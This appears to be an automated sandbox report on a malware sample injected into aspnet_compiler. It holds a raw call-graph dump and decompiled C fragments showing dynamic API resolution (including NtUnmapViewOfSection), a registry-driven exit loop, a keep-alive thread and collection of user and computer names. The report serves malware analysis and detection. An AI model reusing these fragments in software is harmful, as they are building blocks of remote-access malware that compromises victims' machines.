47399 403242 47383->47399 47386->46935 47387->46930 47388->46932 47389->46930 47391 40228c 47390->47391 47392 40223c 47390->47392 47391->47379 47392->47391 47394 402759 11 API calls std::_Deallocate 47392->47394 47394->47391 47396 40320e 47395->47396 47405 4035f8 47396->47405 47398 40321b 47398->47383 47400 40324e 47399->47400 47401 402232 11 API calls 47400->47401 47402 403268 47401->47402 47431 402316 47402->47431 47406 403606 47405->47406 47407 403624 47406->47407 47408 40360c 47406->47408 47410 40363c 47407->47410 47411 40367e 47407->47411 47416 403686 28 API calls 47408->47416 47415 403622 47410->47415 47417 4027c6 47410->47417 47428 402884 22 API calls std::_Xinvalid_argument 47411->47428 47415->47398 47416->47415 47418 4027cf 47417->47418 47419 402831 47418->47419 47420 4027d9 47418->47420 47430 402884 22 API calls std::_Xinvalid_argument 47419->47430 47423 4027e2 47420->47423 47424 4027f5 47420->47424 47429 402aca 28 API calls __EH_prolog 47423->47429 47426 4027f3 47424->47426 47427 402232 11 API calls 47424->47427 47426->47415 47427->47426 47429->47426 47432 402327 47431->47432 47433 402232 11 API calls 47432->47433 47434 4023a7 47433->47434 47434->46936 47436 404166 47435->47436 47437 402232 11 API calls 47436->47437 47438 404171 47437->47438 47446 40419c 47438->47446 47441 4042dc 47458 404333 47441->47458 47443 4042ea 47444 403242 11 API calls 47443->47444 47445 4042f9 47444->47445 47445->46949 47447 4041a8 47446->47447 47450 4041b9 47447->47450 47449 40417c 47449->47441 47451 4041c9 47450->47451 47452 4041e6 47451->47452 47453 4041cf 47451->47453 47454 4027c6 28 API calls 47452->47454 47457 404247 28 API calls 47453->47457 47456 4041e4 47454->47456 47456->47449 47457->47456 47459 40433f 47458->47459 47462 404351 47459->47462 47461 40434d 47461->47443 47463 40435f 47462->47463 47464 404365 47463->47464 47465 40437e 47463->47465 47528 4034c6 28 API calls 47464->47528 47466 402868 22 API calls 47465->47466 47467 404386 47466->47467 47470 4043f9 
47467->47470 47471 40439f 47467->47471 47469 40437c 47469->47461 47529 402884 22 API calls std::_Xinvalid_argument 47470->47529 47471->47469 47473 4027c6 28 API calls 47471->47473 47473->47469 47528->47469 47530->46963 47532 40ae86 47531->47532 47533 402232 11 API calls 47532->47533 47534 40ae91 47533->47534 47537 40aea6 47534->47537 47536 40aea0 47536->46973 47538 40aee0 47537->47538 47539 40aeb2 47537->47539 47544 402884 22 API calls std::_Xinvalid_argument 47538->47544 47541 4027c6 28 API calls 47539->47541 47543 40aebc 47541->47543 47543->47536 47551 43939a 47545->47551 47549 412ba1 47548->47549 47550 412b77 RegSetValueExA RegCloseKey 47548->47550 47549->46981 47550->47549 47554 43931b 47551->47554 47553 4016ed 47553->46983 47555 43932a 47554->47555 47556 43933e 47554->47556 47560 43eead 20 API calls _free 47555->47560 47559 43932f __alldvrm _strftime 47556->47559 47561 4471d7 11 API calls 2 library calls 47556->47561 47559->47553 47560->47559 47561->47559 47565 41a454 ctype ___scrt_get_show_window_mode 47562->47565 47563 402073 28 API calls 47564 414290 47563->47564 47564->46990 47565->47563 47566->47007 47568 414249 getaddrinfo WSASetLastError 47567->47568 47569 41423f 47567->47569 47568->47034 47686 4140cd 29 API calls ___std_exception_copy 47569->47686 47571 414244 47571->47568 47573 404826 socket 47572->47573 47574 404819 47572->47574 47576 404840 CreateEventW 47573->47576 47577 404822 47573->47577 47687 40487e WSAStartup 47574->47687 47576->47034 47577->47034 47578 40481e 47578->47573 47578->47577 47580 404f45 47579->47580 47585 404fc6 47579->47585 47581 404f4e 47580->47581 47582 404fa0 CreateEventA 47580->47582 47583 404f5d GetLocalTime 47580->47583 47581->47582 47582->47585 47688 41a6e9 28 API calls 47583->47688 47585->47034 47586 404f71 47689 4052dd 28 API calls 47586->47689 47595 4049fb 47594->47595 47596 4048ce 47594->47596 47597 40495e 47595->47597 47598 404a01 WSAGetLastError 47595->47598 47596->47597 47603 4052fe 28 API calls 47596->47603 47618 
404903 47596->47618 47597->47034 47598->47597 47599 404a11 47598->47599 47600 404912 47599->47600 47601 404a16 47599->47601 47609 402073 28 API calls 47600->47609 47701 41b45a 30 API calls 47601->47701 47606 4048ef 47603->47606 47605 40490b 47605->47600 47612 404921 47605->47612 47607 402073 28 API calls 47606->47607 47610 4048fe 47607->47610 47608 404a20 47702 4052dd 28 API calls 47608->47702 47613 404a60 47609->47613 47614 41a04a 79 API calls 47610->47614 47620 404930 47612->47620 47621 404967 47612->47621 47616 402073 28 API calls 47613->47616 47614->47618 47617 404a6f 47616->47617 47622 41a04a 79 API calls 47617->47622 47690 41f56b 27 API calls 47618->47690 47625 402073 28 API calls 47620->47625 47698 42034b 53 API calls 47621->47698 47622->47597 47628 40493f 47625->47628 47627 40496f 47630 4049a4 47627->47630 47631 404974 47627->47631 47632 402073 28 API calls 47628->47632 47700 41f711 28 API calls 47630->47700 47635 402073 28 API calls 47631->47635 47636 40494e 47632->47636 47639 404983 47635->47639 47637 41a04a 79 API calls 47636->47637 47640 404953 47637->47640 47638 4049ac 47641 4049d9 CreateEventW CreateEventW 47638->47641 47643 402073 28 API calls 47638->47643 47642 402073 28 API calls 47639->47642 47691 41f5ab 47640->47691 47641->47597 47644 404992 47642->47644 47646 4049c2 47643->47646 47647 41a04a 79 API calls 47644->47647 47648 402073 28 API calls 47646->47648 47649 404997 47647->47649 47650 4049d1 47648->47650 47699 41f9bd 51 API calls 47649->47699 47652 41a04a 79 API calls 47650->47652 47653 4049d6 47652->47653 47653->47641 47655 404e20 SetEvent CloseHandle 47654->47655 47656 404e37 closesocket 47654->47656 47657 404eb8 47655->47657 47658 404e44 47656->47658 47657->47034 47659 404e53 47658->47659 47660 404e5a 47658->47660 47705 4050c4 83 API calls 47659->47705 47662 404e6c WaitForSingleObject 47660->47662 47663 404eae SetEvent CloseHandle 47660->47663 47664 41f5ab 3 API calls 47662->47664 47663->47657 47665 404e7b SetEvent WaitForSingleObject 
47664->47665 47666 41f5ab 3 API calls 47665->47666 47667 404e93 SetEvent FindCloseChangeNotification FindCloseChangeNotification 47666->47667 47667->47663 47668->47034 47669->47034 47671->47034 47672->47034 47673->47034 47674->47034 47675->47060 47676->47060 47677->47060 47678->47060 47679->47060 47680->47060 47681->47060 47682->47060 47683->47060 47684->47060 47685->47060 47686->47571 47687->47578 47688->47586 47690->47605 47692 41f5b3 47691->47692 47693 41d01c 47691->47693 47692->47597 47694 41d02a 47693->47694 47703 41c166 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47693->47703 47704 41cd4c DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47694->47704 47697 41d031 47698->47627 47699->47640 47700->47638 47701->47608 47703->47694 47704->47697 47705->47660 47706->47103 47707->47129 47708->47128 47709->47117 47710->47121 47711->47127 47712->47157 47717 40ed05 47715->47717 47716 412831 3 API calls 47716->47717 47717->47716 47718 40eda9 47717->47718 47720 40ed99 Sleep 47717->47720 47737 40ed37 47717->47737 47745 4086d0 28 API calls 47718->47745 47720->47717 47723 41a7b9 28 API calls 47723->47737 47724 40edb4 47725 41a7b9 28 API calls 47724->47725 47726 40edc0 47725->47726 47746 412afc 14 API calls 47726->47746 47729 401ee9 11 API calls 47729->47737 47730 40edd3 47731 401ee9 11 API calls 47730->47731 47733 40eddf 47731->47733 47732 402073 28 API calls 47732->47737 47734 402073 28 API calls 47733->47734 47735 40edf0 47734->47735 47738 412a57 14 API calls 47735->47738 47736 412a57 14 API calls 47736->47737 47737->47720 47737->47723 47737->47729 47737->47732 47737->47736 47742 40c5a4 111 API calls ___scrt_get_show_window_mode 47737->47742 47743 4086d0 28 API calls 47737->47743 47744 412afc 14 API calls 47737->47744 47739 40ee03 47738->47739 47747 411d93 TerminateProcess WaitForSingleObject 47739->47747 47741 40ee0b ExitProcess 47743->47737 47744->47737 47745->47724 47746->47730 47747->47741 47748 433180 47753 433452 
SetUnhandledExceptionFilter 47748->47753 47750 433185 pre_c_initialization 47754 443e4c 20 API calls 2 library calls 47750->47754 47752 433190 47753->47750 47754->47752 47755 425556 47760 4255d3 send 47755->47760 47761 4254e7 47767 4255bc recv 47761->47767 47768 44202d 47769 442036 47768->47769 47770 44204f 47768->47770 47771 44203e 47769->47771 47775 4420b5 47769->47775 47773 442046 47773->47771 47786 442382 22 API calls 2 library calls 47773->47786 47776 4420c1 47775->47776 47777 4420be 47775->47777 47787 44dc5d GetEnvironmentStringsW 47776->47787 47777->47773 47780 4420ce 47796 445002 20 API calls _free 47780->47796 47783 442103 47783->47773 47784 4420d9 47795 445002 20 API calls _free 47784->47795 47786->47770 47788 4420c8 47787->47788 47789 44dc71 47787->47789 47788->47780 47794 4421da 26 API calls 3 library calls 47788->47794 47797 444a38 47789->47797 47791 44dc85 ctype 47804 445002 20 API calls _free 47791->47804 47793 44dc9f FreeEnvironmentStringsW 47793->47788 47794->47784 47795->47780 47796->47783 47798 444a76 47797->47798 47799 444a46 ___crtLCMapStringA 47797->47799 47806 43eead 20 API calls _free 47798->47806 47799->47798 47801 444a61 RtlAllocateHeap 47799->47801 47805 441850 7 API calls 2 library calls 47799->47805 47801->47799 47802 444a74 47801->47802 47802->47791 47804->47793 47805->47799 47806->47802 47807 41c8c8 47808 41c8dd ctype ___scrt_get_show_window_mode 47807->47808 47820 41cae0 47808->47820 47826 4317cf 21 API calls new 47808->47826 47811 41caf1 47814 41ca94 47811->47814 47822 4317cf 21 API calls new 47811->47822 47812 41ca8d ___scrt_get_show_window_mode 47812->47814 47827 4317cf 21 API calls new 47812->47827 47816 41cb2a ___scrt_get_show_window_mode 47816->47814 47823 431e55 47816->47823 47818 41caba ___scrt_get_show_window_mode 47818->47814 47828 4317cf 21 API calls new 47818->47828 47820->47814 47821 41c46d DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 47820->47821 47821->47811 47822->47816 
47829 431d74 47823->47829 47825 431e5d 47825->47814 47826->47812 47827->47818 47828->47820 47830 431d8d 47829->47830 47833 431d83 47829->47833 47830->47833 47835 4317cf 21 API calls new 47830->47835 47832 431dae 47832->47833 47836 432142 CryptAcquireContextA 47832->47836 47833->47825 47835->47832 47837 432163 CryptGenRandom 47836->47837 47838 43215e 47836->47838 47837->47838 47839 432178 CryptReleaseContext 47837->47839 47838->47833 47839->47838 47840 441ffe 47841 442007 47840->47841 47846 442020 47840->47846 47842 44200f 47841->47842 47847 44205c 47841->47847 47844 442017 47844->47842 47860 442303 22 API calls 2 library calls 47844->47860 47848 442065 47847->47848 47849 442068 47847->47849 47848->47844 47850 44d8d9 48 API calls 47849->47850 47851 44206f 47850->47851 47861 44dbda GetEnvironmentStringsW 47851->47861 47856 4420af 47856->47844 47857 442085 47874 445002 20 API calls _free 47857->47874 47859 44207a 47875 445002 20 API calls _free 47859->47875 47860->47846 47862 44dbf1 47861->47862 47872 44dc44 47861->47872 47865 44dbf7 WideCharToMultiByte 47862->47865 47863 442074 47863->47859 47873 442109 26 API calls 4 library calls 47863->47873 47864 44dc4d FreeEnvironmentStringsW 47864->47863 47866 44dc13 47865->47866 47865->47872 47867 444a38 ___crtLCMapStringA 21 API calls 47866->47867 47868 44dc19 47867->47868 47869 44dc20 WideCharToMultiByte 47868->47869 47870 44dc36 47868->47870 47869->47870 47876 445002 20 API calls _free 47870->47876 47872->47863 47872->47864 47873->47857 47874->47859 47875->47856 47876->47872 47877 42e1f8 47878 42e203 47877->47878 47879 42e217 47878->47879 47881 4317f9 47878->47881 47882 431804 47881->47882 47883 431808 47881->47883 47882->47879 47885 43f7dd 47883->47885 47886 444a86 47885->47886 47887 444a93 47886->47887 47888 444a9e 47886->47888 47889 444a38 ___crtLCMapStringA 21 API calls 47887->47889 47890 444aa6 47888->47890 47896 444aaf ___crtLCMapStringA 47888->47896 47894 444a9b 47889->47894 47898 445002 20 API calls _free 
47890->47898 47892 444ab4 47899 43eead 20 API calls _free 47892->47899 47893 444ad9 RtlReAllocateHeap 47893->47894 47893->47896 47894->47882 47896->47892 47896->47893 47900 441850 7 API calls 2 library calls 47896->47900 47898->47894 47899->47894 47900->47896 47901 43a728 47903 43a734 _swprintf ___scrt_is_nonwritable_in_current_image 47901->47903 47902 43a742 47917 43eead 20 API calls _free 47902->47917 47903->47902 47905 43a76c 47903->47905 47912 444189 EnterCriticalSection 47905->47912 47907 43a747 ___scrt_is_nonwritable_in_current_image _strftime 47908 43a777 47913 43a818 47908->47913 47912->47908 47915 43a826 47913->47915 47914 43a782 47918 43a79f LeaveCriticalSection std::_Lockit::~_Lockit 47914->47918 47915->47914 47919 447fec 36 API calls 2 library calls 47915->47919 47917->47907 47918->47907 47919->47915 47920 40163e 47921 401646 47920->47921 47922 401649 47920->47922 47923 401688 47922->47923 47925 401676 47922->47925 47924 432df5 new 22 API calls 47923->47924 47926 40167c 47924->47926 47927 432df5 new 22 API calls 47925->47927 47927->47926

                Control-flow Graph

                C-Code - Quality: 100%
                			E0041B4C9() {
                				struct HINSTANCE__* _t1;
                				_Unknown_base(*)()* _t2;
                				_Unknown_base(*)()* _t6;
                				_Unknown_base(*)()* _t10;
                				_Unknown_base(*)()* _t18;
                				_Unknown_base(*)()* _t24;
                				_Unknown_base(*)()* _t30;
                				_Unknown_base(*)()* _t34;
                				CHAR* _t42;
                				CHAR* _t45;
                				CHAR* _t46;
                				CHAR* _t47;
                				CHAR* _t48;
                				CHAR* _t49;
                
                				_t45 = "GetModuleFileNameExA";
                				_t1 = LoadLibraryA("Psapi.dll"); // executed
                				_t2 = GetProcAddress(_t1, _t45);
                				 *0x472b00 = _t2;
                				if(_t2 == 0) {
                					 *0x472b00 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t45);
                				}
                				_t46 = "GetModuleFileNameExW";
                				 *0x472af8 = GetProcAddress(LoadLibraryA("Psapi.dll"), _t46);
                				if( *0x472b00 == 0) {
                					 *0x472af8 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t46);
                				}
                				_t6 = GetProcAddress(GetModuleHandleA("shcore"), "SetProcessDpiAwareness");
                				 *0x472ad8 = _t6;
                				if(_t6 == 0) {
                					 *0x472adc = GetProcAddress(GetModuleHandleA("user32"), "SetProcessDpiAware");
                				}
                				GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
                				_t10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                				_t47 = "kernel32";
                				 *0x472aec = _t10;
                				 *0x472af4 = GetProcAddress(GetModuleHandleA(_t47), "IsWow64Process");
                				 *0x472afc = GetProcAddress(GetModuleHandleA(_t47), "GetComputerNameExW");
                				 *0x472ae8 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
                				_t18 = GetProcAddress(GetModuleHandleA(_t47), "SetProcessDEPPolicy");
                				_t48 = "user32";
                				 *0x472ae0 = _t18;
                				 *0x472ad0 = GetProcAddress(GetModuleHandleA(_t48), "EnumDisplayDevicesW");
                				 *0x472ad4 = GetProcAddress(GetModuleHandleA(_t48), "EnumDisplayMonitors");
                				_t24 = GetProcAddress(GetModuleHandleA(_t48), "GetMonitorInfoW");
                				_t49 = "kernel32.dll";
                				 *0x472b18 = _t24;
                				 *0x472b08 = GetProcAddress(GetModuleHandleA(_t49), "GetSystemTimes");
                				 *0x472b14 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                				_t30 = GetProcAddress(LoadLibraryA(_t49), "GetConsoleWindow");
                				_t42 = "ntdll";
                				 *0x472b0c = _t30;
                				 *0x472b04 = GetProcAddress(GetModuleHandleA(_t42), "NtSuspendProcess");
                				_t34 = GetProcAddress(GetModuleHandleA(_t42), "NtResumeProcess");
                				 *0x472af0 = _t34;
                				return _t34;
                			}


















                APIs
                • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4DE
                • GetProcAddress.KERNEL32(00000000), ref: 0041B4E7
                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4FE
                • GetProcAddress.KERNEL32(00000000), ref: 0041B501
                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B513
                • GetProcAddress.KERNEL32(00000000), ref: 0041B516
                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B52C
                • GetProcAddress.KERNEL32(00000000), ref: 0041B52F
                • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040DEE5), ref: 0041B540
                • GetProcAddress.KERNEL32(00000000), ref: 0041B543
                • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040DEE5), ref: 0041B558
                • GetProcAddress.KERNEL32(00000000), ref: 0041B55B
                • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040DEE5), ref: 0041B56C
                • GetProcAddress.KERNEL32(00000000), ref: 0041B56F
                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040DEE5), ref: 0041B57B
                • GetProcAddress.KERNEL32(00000000), ref: 0041B57E
                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040DEE5), ref: 0041B590
                • GetProcAddress.KERNEL32(00000000), ref: 0041B593
                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040DEE5), ref: 0041B5A0
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5A3
                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040DEE5), ref: 0041B5B4
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5B7
                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040DEE5), ref: 0041B5C4
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5C7
                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040DEE5), ref: 0041B5D9
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5DC
                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040DEE5), ref: 0041B5E9
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5EC
                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040DEE5), ref: 0041B5F9
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5FC
                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040DEE5), ref: 0041B60E
                • GetProcAddress.KERNEL32(00000000), ref: 0041B611
                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040DEE5), ref: 0041B61F
                • GetProcAddress.KERNEL32(00000000), ref: 0041B622
                • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040DEE5), ref: 0041B62F
                • GetProcAddress.KERNEL32(00000000), ref: 0041B632
                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040DEE5), ref: 0041B644
                • GetProcAddress.KERNEL32(00000000), ref: 0041B647
                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040DEE5), ref: 0041B654
                • GetProcAddress.KERNEL32(00000000), ref: 0041B657
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModule$LibraryLoad
                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll$ntdll.dll$shcore$user32
                • API String ID: 551388010-626199206
                • Opcode ID: d2d1844e2719a9dcaac12d858f5210b20b1b817276e2085d58da0c67cb1bf55f
                • Instruction ID: 5a53dc12768b909e1e2e060ec693a1e80cbb19dbcc6530350e1da79dd032a68e
                • Opcode Fuzzy Hash: d2d1844e2719a9dcaac12d858f5210b20b1b817276e2085d58da0c67cb1bf55f
                • Instruction Fuzzy Hash: C441EEA0E407187AD620BFB65D49E1B3E9CEA41B547110837B508B3551FAFCA8908F6F
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 56%
                			E0040ECEA() {
                				signed int _v32;
                				void* _t13;
                				void* _t22;
                				char* _t34;
                				void* _t63;
                				signed int _t64;
                				void* _t66;
                				void* _t67;
                				void* _t69;
                
                				_t66 = (_t64 & 0xfffffff8) - 0x1c;
                				_t34 = L"pth_unenc";
                				while(1) {
                					_v32 = _v32 & 0x00000000;
                					_t52 = E00401F8B(0x473238); // executed
                					E00412831(_t10, "override",  &_v32); // executed
                					_t13 = _v32 - 1;
                					if(_t13 == 0) {
                						goto L5;
                					}
                					_t22 = _t13 - 1;
                					if(_t22 == 0) {
                						_t70 = _t66 - 0x1c;
                						E004086D0(_t34, _t66 - 0x1c, _t52, __eflags, 0x473220);
                						_push(_t34);
                						E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v32, 0x473238)));
                						E00401EE9();
                						_push(1);
                						E00402073(_t34, _t70 + 0x20 - 0x18, _t25, _t63, "4.6.0 Pro");
                						_push("v");
                						E00412A57(0x473238, E00401F8B(0x473238));
                						E00411D93();
                						ExitProcess(0);
                					}
                					_t77 = _t22 != 1;
                					if(_t22 != 1) {
                						L6:
                						Sleep(0xbb8); // executed
                						continue;
                					}
                					E0040C5A4();
                					L5:
                					_t67 = _t66 - 0x1c;
                					E004086D0(_t34, _t67, _t52, _t77, 0x473220);
                					_push(_t34);
                					E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v32, 0x473238)));
                					E00401EE9();
                					_push(1);
                					_t69 = _t67 + 0x20 - 0x18;
                					E00402073(_t34, _t69, _t16, _t63, "4.6.0 Pro");
                					_push("v");
                					E00412A57(0x473238, E00401F8B(0x473238));
                					_t66 = _t69 + 0x20;
                					goto L6;
                				}
                			}













                APIs
                  • Part of subcall function 00412831: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                  • Part of subcall function 00412831: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                  • Part of subcall function 00412831: RegCloseKey.KERNELBASE(?), ref: 0041287A
                • Sleep.KERNELBASE(00000BB8), ref: 0040ED9E
                • ExitProcess.KERNEL32 ref: 0040EE0D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseExitOpenProcessQuerySleepValue
                • String ID: 2G$4.6.0 Pro$82G$override$pth_unenc
                • API String ID: 2281282204-2513004603
                • Opcode ID: 60a4a1d6a730d7149879e2aadf7621bba3f14efdd4f3bdf51e32d926518ea428
                • Instruction ID: 45cdfc5c20f0b08445f9514382da16a4fbbca6339717cc3b6e195a3b8059c3c5
                • Opcode Fuzzy Hash: 60a4a1d6a730d7149879e2aadf7621bba3f14efdd4f3bdf51e32d926518ea428
                • Instruction Fuzzy Hash: 2721DE31B0020127C608B6B79957AAF35999F80708F50447FF809AA2D7EEBD8A5583DF
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 91%
                			E00404F31(void* __ecx, intOrPtr _a4, char _a8) {
                				struct _SYSTEMTIME _v20;
                				char _v44;
                				void* __edi;
                				void* __ebp;
                				void* _t16;
                				void* _t21;
                				intOrPtr _t29;
                				void* _t31;
                				void* _t32;
                				void* _t33;
                
                				_t31 = __ecx;
                				if( *((char*)(__ecx + 0x5c)) != 0) {
                					__eflags = 0;
                					return 0;
                				}
                				_t29 = _a4;
                				if(_a8 != 0) {
                					__eflags =  *0x470d48;
                					if( *0x470d48 != 0) {
                						GetLocalTime( &_v20);
                						_t16 = E0041A6E9(_t21,  &_v44, _t29);
                						_t34 = _t33 - 0x18;
                						E004052DD(_t21, _t33 - 0x18, "KeepAlive             | Enabled | Timeout: ", _t32, __eflags, _t16);
                						E00402073(_t21, _t34 - 0x14, "KeepAlive             | Enabled | Timeout: ", _t32, "i");
                						E0041A04A(_t21, _t29);
                						E00401FB8();
                					}
                				} else {
                					 *((char*)(__ecx + 0x7c)) = 1;
                				}
                				 *((intOrPtr*)(_t31 + 0x74)) = _t29;
                				 *((char*)(_t31 + 0x5c)) = 1;
                				 *((intOrPtr*)(_t31 + 0x60)) = CreateEventA(0, 0, 0, 0);
                				CreateThread(0, 0, E00405130, _t31, 0, 0); // executed
                				return 1;
                			}














                APIs
                • GetLocalTime.KERNEL32(?), ref: 00404F61
                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                • CreateThread.KERNELBASE ref: 00404FC0
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Create$EventLocalThreadTime
                • String ID: KeepAlive | Enabled | Timeout: $Cqt
                • API String ID: 2532271599-1719384028
                • Opcode ID: f44067441d12eeb199d79db0566863068f31dfe9cf37c331ee33c08da6605574
                • Instruction ID: 81ef762065af47e4dab8e296ef88b7c3b87c262db6361300a2954e924f939db2
                • Opcode Fuzzy Hash: f44067441d12eeb199d79db0566863068f31dfe9cf37c331ee33c08da6605574
                • Instruction Fuzzy Hash: D711E3719043816AC720AB769C0DE9BBFB89BD6710F04016FF44562282DAB89485CBBA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00432142(HCRYPTPROV* __ecx, BYTE* __edx) {
                				int _v12;
                				int _t2;
                				void* _t6;
                				BYTE* _t9;
                				long** _t10;
                
                				_t10 = __ecx;
                				_t9 = __edx;
                				_t2 = CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000); // executed
                				if(_t2 != 0) {
                					if(CryptGenRandom( *_t10, _v12, _t9) != 0) {
                						CryptReleaseContext( *_t10, 0);
                						return 0;
                					}
                					_push(0xffffff98);
                					L2:
                					_pop(_t6);
                					return _t6;
                				}
                				_push(0xffffff99);
                				goto L2;
                			}









                APIs
                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431DCA,00000034,?,?,01415250), ref: 00432154
                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431E5D,00000000,?,00000000), ref: 0043216A
                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431E5D,00000000,?,00000000,0041CB5C), ref: 0043217C
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Context$AcquireRandomRelease
                • String ID:
                • API String ID: 1815803762-0
                • Opcode ID: 87b52fe04148b378890c993190cc93a161ae8e284d280082790b9f2e946aa0e2
                • Instruction ID: adb372f61302f159ea37c7bd5427d8c721a4b5411f3f4e54cdc0eebfb1d2689f
                • Opcode Fuzzy Hash: 87b52fe04148b378890c993190cc93a161ae8e284d280082790b9f2e946aa0e2
                • Instruction Fuzzy Hash: 98E0923130C310BBFF310F25BE08F173A94EB89B75F21063AF211E40E4D6918801961C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E0041A168(void* __ecx, void* __edx, void* __edi, void* __eflags) {
                				char _v8;
                				long _v12;
                				char _v36;
                				char _v60;
                				char _v92;
                				short _v604;
                				void* __ebp;
                				void* _t26;
                				void* _t35;
                				void* _t39;
                				void* _t40;
                				void* _t41;
                
                				_t41 = __eflags;
                				_t35 = __edx;
                				_v8 = 0x10;
                				_t39 = __ecx;
                				 *0x472afc(1,  &_v92,  &_v8); // executed
                				_v12 = 0x100;
                				GetUserNameW( &_v604,  &_v12); // executed
                				E00402FF4(_t26, _t39, E004042DC(_t26,  &_v36,  &_v92, _t40, _t41, E0040415E(_t26,  &_v60, _t35, _t40, "/")), __edi, _t40, _t41,  &_v604);
                				E00401EE9();
                				E00401EE9();
                				return _t39;
                			}
















                APIs
                • GetUserNameW.ADVAPI32(?,00000010), ref: 0041A19D
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: NameUser
                • String ID:
                • API String ID: 2645101109-0
                • Opcode ID: 984a9e89f53b954de54a43e274cc1f929642feed54526eb4c94be657c4784051
                • Instruction ID: ca40992a929d7f440b27bf36de23ad6c7f00c11e63c364431abc424016e70018
                • Opcode Fuzzy Hash: 984a9e89f53b954de54a43e274cc1f929642feed54526eb4c94be657c4784051
